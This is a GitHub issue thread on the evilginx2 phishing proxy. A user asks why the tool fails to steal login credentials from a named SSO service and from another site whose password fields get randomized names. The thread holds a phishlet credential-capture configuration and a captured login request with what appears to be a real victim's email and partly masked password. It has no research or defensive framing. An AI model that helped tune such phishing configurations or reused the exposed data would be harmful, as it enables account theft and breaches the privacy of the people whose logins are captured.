### ISSUE TITLE
GET Steal login

### ISSUE THREAD

**Issue by smtseller2016** [kgretzky/evilginx2#316]
First problem :  why cant steal user and password credentials?
They use for login sso5.mbdsrv.com

`https://sso5.mbdsrv.com/js/login?service=https%3A%2F%2Fwww.xxxxxxx.com%2Flogin_check&callback=ssoLoginCheck&cas_login%5Bemail%5D=asdasdas%40asd.com&cas_login%5Bpassword%5D=asdasda&g-recaptcha-response=&cas_login%5Btoken%5D=1559136632-0db9b2b3ed3d59d11522fc295c853970edc9f92d`

```
GET /js/login?service=https%3A%2F%2Fwww.xxxxxxx.com%2Flogin_check&callback=ssoLoginCheck&cas_login%5Bemail%5D=TorstenPabst1988%40gmx.de&cas_login%5Bpassword%5D=Torstexxxxxxnx&g-recaptcha-response=&cas_login%5Btoken%5D=1559145585-767b3b0bc93b42f858358f2890128e5fb766a156 HTTP/1.1
Host: sso5.mbdsrv.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate

credentials:
  username:
    key: 'cas_login[email]'
    search: '(.*)'
    type: 'post'
  password:
    key: 'cas_login[password]'
    search: '(.*)'
    type: 'post
```

An i have another problem with a website 
```
		    <input type="text" id="a672736cc" name="a672736cc" onkeydown="return disableEnter(event)" />
		    </div>
		    <div class="mar-b-sm">
			    <label for="a746ec22a">Passwort</label>
			    <input autocomplete="off" type="password" id="a746ec22a" name="a746ec22a" onkeypress="return handleEnter(event, function() {setFieldValue('LoginForm$loginaction', 'login');submitForm('', '/xxx.aspx');})" />
```

Every refresh they change value for login ?
Why need to do 
Thanks alot !
		    </div>
